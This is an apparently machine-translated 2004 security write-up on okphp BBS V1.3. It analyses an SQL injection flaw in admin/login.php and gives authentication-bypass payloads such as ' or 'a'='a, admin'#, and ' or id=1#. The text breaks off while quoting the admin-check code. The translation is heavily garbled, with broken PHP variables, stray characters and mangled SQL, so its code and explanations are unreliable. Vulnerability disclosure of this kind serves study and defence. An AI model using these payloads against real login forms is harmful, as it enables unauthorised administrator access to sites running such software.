Talking about PHP MySQL Synthetic Scala Construction - Safety Analysis ofokphp BBS V1.3
Wen / Black Black · ≯super · hei2004-4-26our team: bst http://www.darkne2s.org security angel http://www.4ngel.net
"Vulnerability" analysis:
1.Admin / login.php injection causes bypassing authentication vulnerabilities:
Code: ------------------------------------------------ ------------------------ $ conn = SQL_Connect ($ DBHOST, $ DBUSER, $ dbpswd, $ dbname); $ password = md5 ($ Password $ = "SELECT ID, Group_ID from $ user_table where username = '$ usrname' and password = '$ password'; $ = SQL_QUERY ($, $ conn); $ row = sql_fetch_row ($ RES); -------------------------------------------------- -----------------------
$ = "select id, group_id from $ user_table where username = '$ usrname' and password = '$ password'" There is no filtration, which is easy to bypass. For select * from $ user_table where username = '$ usrname' and password = '$ password' This statement modification method is:
Construct 1 (using logical operation): $ usrname = 'or' a '=' a $ password = 'or' a '=' is equivalent to SQL statement: SELECT * from $ user_table where username = '' or 'a' = 'a' and password = '' or 'a' = 'a'
Constructing 2 (using the comments in MySQL): $ Password comment out: $ username = admin '# (or admin' / *)
That is: SELECT * from $ user_table where username = 'admin' # 'and password =' $ password '"equivalent to: select * from $ user_table where username =' admin '
$ Password in the $ q state in admin / login.php is encrypted before the query is encrypted so that the statement in the construct 1 cannot be bypassed. Here we use construction 2:
Select ID, group_id from $ user_table where username = 'admin' # 'and password =' $ password '"is equivalent to: select ID, group_id from $ user_table where username =' admin 'As long as the user name is admin, if I don't know the username, I only know the corresponding id, we can construct: $ usrname = 'or id = 1 # Parler: select ID, group_id from $ user_table where username =' or id = 1 # and password = ' $ Password '(# # 掉 掉)
Let's look down on the code: ------------------------------------------- ------------------------------- IF ($ ROW [0]) {// if not admin or super moderatorif ($ Username! = "admin" &&! EREGI ("(^ | &) 3 ($ | &)", $ row [1])) {$ login = 0;} else {$ login = 1;} // Fail To login --------------- if (! $ login) {Write_log ("Moderator Login", "0", "Password Wrong"); Echo "